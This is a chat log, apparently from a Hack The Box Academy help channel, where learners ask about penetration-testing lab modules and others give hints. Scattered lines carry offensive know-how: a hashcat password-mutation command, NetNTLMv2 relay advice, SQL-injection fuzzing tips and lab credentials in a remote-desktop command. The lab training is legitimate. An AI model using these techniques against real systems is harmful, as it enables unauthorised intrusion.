Do not use best64
Also just use the full list
The list you should end up with on total is 94k characters. Splitting it only adds unnecessary time
hey am new here and i need some help
i wanna go to modules to start a new one but i cant. i need to type the modules on the link (https://academy.hackthebox.com/modules) and when i go there i cant unlock any new modules and i have cubes
Disable adblock/pop-up blocker in your browser
Otherwise contact support
thanks for responding. i dont have an ad blocker or somth like that. it says: javascript: void(0);
That's just a standard button thing
That really doesn't mean much
are you opening it in a new tab
If you're using brave browser, for instance, it has built-in tools like that
am in the hack the box academy dashboard and when i press modules it doesnt work
i have tried chrome and firefox
yes are you trying to open the link in a new tab?
Do you see a green bubble in the bottom right?
nope
Then there's some form of ad block running
i will search and inform you. thanks for everything
Open in incognito mode and see if it's there
FINALLY ITS WORKING
you probably have noscript enabled, make sure you allow js to run on the website
there was an ad blocker that i disabled but i needed to remove the extension
thanks for everything everyone that responded me
Has anyone online/available completed the ADCS module by chance? May I DM? Stuck on ESC11
I have done that part, dm
@next bronze thanks
same
You know what , i have a question where can i start learning ?
Im not sure i joined this to learn how to hack
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
No one is really gonna sit down with you and teach you one-on-one
At least not for free
Tryhackme is another decent beginner resource for learning, way more hand-holding
academy is nice
Hi, im stuck on the file transfer module, linux interactive question:" Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer." The problem is that i cant extract the file because i cant use unzip on the ssh session. Any suggestions?
Would you be able to please check the commands i'm running, they are returning files > 94k chars
@covert swift As far as i know i also couldnt use unzip, did it with python
Hi Team,
Need some help regarding learning Redhat Linux guide for completing my modules.
It should just be the command from the section
gotta admit real world xss this section in XSS is golden - https://academy.hackthebox.com/module/103/section/982
Sorry we can't help you with redhat as some of it is fundamentally different than other distributions
ok i will try thanks
The command they have is hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list which is giving me a file way higher which is why I thought about splitting it down
That's giving you the expected file
You can increase threads with hydra
48 seems to be the sweet spot, no dropped requests leading to confusion
I've tried that too, still not getting any correct responses
Make sure lowercase sam
And are you attacking ftp?
You should not be attacking ssh
Yes, lowercase sam and ftp
Hey Marcielee,
Thanks for your response,
I got stuck at Broken Authentication Assessment, I found the admin/support users with the country code and found that the cookie is made of the username formatted to md5 and base64 but can't put those together. Keep getting user admin.us can't have requested role (or something)
Any help would be much appreciated
I'm doing the Dynamic Port Forwarding with SSH and SOCKS module. My /etc/proxychains.conf is blank.
I am using kali linux on a vm. Should this have a default config already setup?
Just seems strange that it's blank.
I think on kali it's like proxychains4 or something like that
Let tab autocomplete help you there
I had to install proxychains, didn't realize it wasn't there by default, easy fix though!
alright so im back at this trying to upload a zip file to a windows server
Yeah, there is a proxychains4!
i think im close
Invoke-WebRequest -Uri https://10.129.201.55:443/ -Method POST -Body $Encoded
Invoke-WebRequest: The remote certificate is invalid according to the validation procedure: RemoteCertificateNameMismatch, RemoteCertificateChainErrors
this is what i ran
Try http
Not https
should i specify a port?
If it's running on default 80, no
access forbidden
You only need to specify port for non-standard port, 80=http,443=https
my nmap scan shows 80 and 443 are forbidden
Windows file transfer methods is the section name
File Transfers is the module name
Where are you grabbing the zip from
its in the questions section
Is it from your machine, or the target
question #2

Hi MacieLee can I dm u?
That's not what I'm getting at
the download is in the questions lol
That's not what I'm talking about
So you downloaded the zip to YOUR machine yes?
yes
So why are you doing an invoke request to the target? From the target?
Should be a get request from an http server running on your system
PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function. We'll also need a web server that accepts uploads, which is not a default option in most common webserver utilities.

thats straight from the module
yes i get that
So why in your command are you calling it from the windows machine to the windows machine to pull?
i see what you're getting at
So you see where you're going wrong?
yeah i do
i guess my understanding prior would be to get into server or upload something to a server i didnt have access to
but i guess this isnt that
@elder jackal @zealous oyster I didn't give permission to dm
You first need to upload the file to the target system
And to pull the file from your system it needs your tun0 ip
On the last part of the SSH and SOCKS tunneling module I'm getting an error when trying to RDP
I figured it out. I had closed the ssh session that I was connected to. I'm assuming that was the issue. It worked when I reopened the ssh session.
Am I supposed to keep every SSH session open in this module, or just the latest one I'm working on?
yeah that'll do it
There are only three, so I guess it doesn't matter.
the ssh connection is what your proxychains is going on
Apologies
-D 9050 tells the ssh connection to treat your connection as a dynamic port forward
For some reason in my head I thought it was locked in on my end once I did the proxychain, but it makes sense now
theres a cmd flag to not start an interactive session
I like that so I dont forget that instance is my tunnel
is there anything I can do with captured netNTLMv2 hashes that can't be cracked
hi
@fathom pendant thank you so much for your help earlier, i was able to upload!
You can relay them
lol The Gaara refrence is 100% accurate
how it gums to 5 chew feel
What I hope is a quick question regarding academy modules in general... I'm currently in the Info Gathering - Web Edition and when looking at the cheat sheet is seems like overload when looking at it, is there a certain way to grasp the information without writing the cheat sheet down for a reference to look at ?
i found a new problem with file transfers module but i believe its actual content issue. i was able to upload the "upload_win.zip" to the windows server. the next step is to extract it and then run hasher upload_win.txt however the result i get and plug into the HTB answer field says its wrong
strange, also there was already a file called upload_win.txt on the desktop and i ran hasher on that.. that result is also wrong
i wonder if they knew this was an issue and tried to correct it that way
repetition is key but I would say just copy paste and when you need it just get the command
after few labs your brain will know what to do
the cheat shit is basically the commands from the module without context of their explanation
usually you're introduced to the command with context of what they do
yeah for sure, I'm just trying to look for a way, to understand the tools mentioned and "basic syntax" if you could call it that without writing 10 pages of commands etc
man <command> and look for the flags that the cheatsheet is using with the command
that way you can summarize what it does
any module out there that contains Metasploit topics?
cant see that any dedicated module to this topic exist out there
https://academy.hackthebox.com/module/details/39 you mean like this?
guys
my vm is spamming the sound i get when i hit backspace on an empty terminal
and i cant click or anything
iirc it's a setting you can turn off
yeah like this but more advanced, i have already finished this one :/
i don't think there's really any advanced ones
i know the pivoting and portfwarding module touches on using msfvenom and metasploit as a pivot/proxy
want one with setting a persistent shell and migrating into processes
ok thx
ima do this
if this is for a machine like on the main platform then yes; wrong place
if it's related to an academy module then more context is needed
#boxes is for the main platform boxes and you can ask for a nudge there
TY
Anyone having network connection issues? Trying to connect to the box in the AD Enumeration & Attacks module (Skills Assessment II), and can't seem to even ssh. Ping shows packet loss...
Now I am getting ssh: connect to host 10.129.210.201 port 22: Connection timed out
Tried resetting the target?
Yes, I have done it 2 times already. And I was having issues with this last night too
Hmm, maybe try regenerating your VPN, use TCP if you already haven't been using that.
I was doing this from the HTB pwnbox.
I thought it was the vpn on my local VM but same happens with the HTB pwnbox
You're not having both running at the same time right?
make sure you aren't accidentally running both at the same time
Ohhh I had my vpn still on in my VM. Just turned it off. Let me try on the HTB box again.
Make sure you're connecting to one VPN connection, Academy VPN doesn't handle switching between pwnBox VPN and normal VPN that well.
Well, same issue. No connection to the target box. If i am using the HTB academy pwnbox, I don't activate a vpn connection. I just boot up the vm in my browser and start working there.
Let me try the TCP vpn file
Using TCP vpn, restarted my personal VM. Things are working, somewhat laggy though.
Why am I getting this error?
I'm doing the "Configuring MSF's SOCKS Proxy" section in the "Meterpreter Tunneling and Port Forwarding" module
youre using it from a meterpreter shell
Anyone familiar with Oracle TNS enumeration page of the Footprinting module? I'm trying to do the tools setup so that I can run sqlplus, but when I run the command to install it I'm getting an error that is saying it is not found
I'm having trouble with footprinting module as well. I need a hint to find full system path of the specific sambashare. Last question of SMB section.
on the file transfer module.. windows file transfer methods, i was able to upload the zip to the windows machine. and when i use hasher against it, what it gives me back, the answer is wrong (question 2)
Use all the tools mentioned
Note: if you did find the path, it looks odd doesn't it?
The hash starts with f
Make sure no weird extra spaces or characters
Module "Pivoting, Tunneling and Port Forwarding"
Section "Dynamic Port Forwarding with SSH and SOCKS Tunneling"
my proxychains is set up to use socks4 on localhost and port 9050
i connect to the victim with the provided credentials and using dynamic port 9050
now everything i try the victim refuses everything i do, what may be the cause?
Once you set up the initial proxy you go to the second host. You don't need proxy chains for the 10.129 host, as you've always been able to access it
Yeah, I try to follow along as I go instead of reading and then doing the questions, so the ordering got hazy on this one. I redid it and backgrounded the session before proceeding. Worked fine after that.
It tells you to background it tbf
oh dang i havent read the question careful enough, didnt notice it says, that i have to scan an internal target like 172.xxx.... xD
yeah makes sense
Iirc this one might be a 3 step process
But I could be wrong
A -> B -> C
The pivot module is very much a follow along
yeah a-b-c seems right
As in there's a user/system between the initial foothold and final target
My eyes mostly glazed over it
Does anyone know an additional fix for the sqlplus error besides the one mentioned in the Oracle TNS lab?
Neither the original set up code or the fix works to download the command works
yes i got the flag thx
@fathom pendant any thoughts on how I can get into SQL server without it? After trying the fix command I still get the "command not found" error when typing in the command
im starting to think theres something wrong with the zip file. I tried a different upload method using encoding/ decoding and get the same issue
C:
Unfortunately I don't believe so as the enumeration is based off sqlplus
Don't give the public ip of your friend, even as a joke

While there's mostly good people out there - there's always the one asshole who will ddos
That's also assuming you're not just a fed bait
good
@fathom pendant will reach out to support, was able to get that MSSQL issue figured out unintentionally with their help
but I don't know English
@weak kindle Ive been stuck on question #3 all day. I know it's something stupid and simple I'm missing, can you help guide me or point me in the right direction?
hello there
i'm stuck on the last section of SQLi fundamentals: skills assessment
i've tried all i know against the login form, found another page that's redirecting me with 302 code but no hint about any SQLi
i even ran SQLmap which tells me that none of the fields are injectable...
Any ideas ?
302 = redirect where is it sending you
If you were like me and simply copying and pasting commands from a previous page, then you might want to make sure that you're writing to the right pages/files.
/dashboard/index.php with size 0
no content
ah
"writing to files" ?
not even sure that page exists - ||thats not where you should be redirected to||
not inventing it xD
I'm not actually a hacker, I just come here to feel cool
use ||payloadsallthethings, turn it into a wordlist, capture with burp and fuzz the login|| around 5 payloads from there works
There is a very simple idea to go about this taught in the module, inject the username with an OR logic query and try
thank you
congrats (we don't care) this isn't a gen chat
there's still their initial message lmao <@&861185840277487616> whoever the mysterious angel is
This is a scam btw do not click this
wtf xD
@urban sage wake uuuuuup
ban

name Announcments: brand new account - not labeled as a bot - and not normally how HTB would do a giveaway
Have fun - I really enjoyed that one
mods really do be eepin today
Smart, gotta give em that
sheesh
Its like they come alive around this time
banned
already done
Should remove messages as well
Eh the bot doesnt remove the messages....requires manual
hackster bot yeah? (because you need to control the ban time)
the regular ban command allows you to purge messages for x amount of time
also what did this rami3l guy do to piss off the nazi lmao
Ayy
he just existed
I guess
wear it as a badge of honor
Existence pissing off nazis is a goal
it's always a good day to punch a Nazi
I'm having trouble linking my account so I'm using this as a gen chat
well this isn't a gen chat
and if you're having trouble linking message a mod or admin
:^)
I just installed a version of linux that displays cpu usage and i noticed that when i'm using firefox, either to use youtube or even run pwnbox in desperate times. The cpu usage is redlining. Is this normal? I'm using 3 cpus for the processors setting.
what does redlining mean? is it going above a certain threshold? What's displaying cpu usage? are you using ps -faux, htop or something similar? what version of linux?
that's what my linux beginner would ask
well, it's normal for CPU to reach high usage every once in a while, especially when a process is being loaded, when it boots up and stuff.
It could be that the frequency is low enough that it uses 100% to do x task (as far as I know nowadays processors lower frequency to save on energy).
Glad to hear other people's thoughts
Its pretty normal - Especially for Youtube, it uses alot of technologies that utilize CPU resources like video codecs encoding and decoding and adaptive bitrate streaming
Not to talk of the shit tonne amount of background processes running
Thank you
it'd be concerning if this was temperatures and red meant past temperature limit, usually 100 degrees celsius I think
otherwise you're fine
You need to find a way to ensure your payload output is visible and is not interferred with by other contents if that makes any sense. Btw this contains spoilers.
that's not temp that's cpu usage
haha I know, just saying that the only concerning metric as far as damages is concerned is temp
yeah
I'm working on Password Attacks Lab Hard. So far, I have cracked johanna's password and used that to retrieve an encrypted file from the target. I transferred that file back to my attack machine and used keepass2john to crack it. I get a password for (I think) the user David. Now I'm trying to enumerate SMB shares using crackmapexec using David's credentials, but I get an authentication failure.
incorrect
unless you mean you got the keepass password and unlocked that file
Not really, it'll just slow itself down or even turn off the system if temps are dangerous
yup, but that's not good (having it turn off... (inconvenient af)) and it shouldn't do that in normal browsing, so it indicates some sort of issue with cooling
oh okay ill try that
this assessment is a LOT of back and forth
also, consistent high temps may degrade in the long run, as far as I'm aware
yeah im stucked for 2days
you retrieve a file to crack; then you bounce back to use the cracked info
Its actually so crazy that Youtube is used as a benchmark test for devices battery life and stuff lmao
because you overlooked the reason you pulled the encrypted file (to unlock the password database)
True but can be case by case on the danger / effect and at what temp
that's true
i did verify hash and used encode to transfer file, used john to crack, did it a couple of times, still i get an error while using smbclient to interact with share
clear up this confusion for me: did you use the password to log into keepass
wait a sec i havent ill do it
there you go
that'll unravel it further for you
like i said you completely looked over the reason you pulled the file in the first place
didn't expect that lol
its really confusing
nah you just got ahead of yourself
The story of my life when hacking
if you feel like what you're doing isn't working: take a step back and analyze the steps so far
i.e. you pulled the file, converted and cracked it (note you used a specific 2john script)
sure thing, thanksss
you skipped over using the password on the thing that would need it
yeah yah
also you want to be 99% certain; not 60-70% certain that what you're doing is right
which - by asking here, you weren't certain you were on the right track
my bad tho ! i took your advice on take step back and analyze ! thanks again i appreciate it
you're fine
i'm just giving you a helpful tip to make you think "Am i going in the right direction"
if you have doubts - it's fine to reach out
yeahh sure
can i use xfreerdp on windows and if so which file can i use from the git in order to put it on the windows host to do so?
my brother in christ windows already has its own remote program
that's built in
generally it's called mstsc.exe
or Remote Desktop Connection in the windows search
@fathom pendant ||Start-Process -FilePath "mstsc.exe" -ArgumentList "/v:172.16.6.50:1515", "/u:svc_sql", "/p:lucky7"|| so i tried this but it isn't working. Trying to use this in order to remote into ms01 for the skill assessment 1 for ad enumeration - that's why i asked, but the xfreerdp isn't on the web-win01 server so that is why i asked
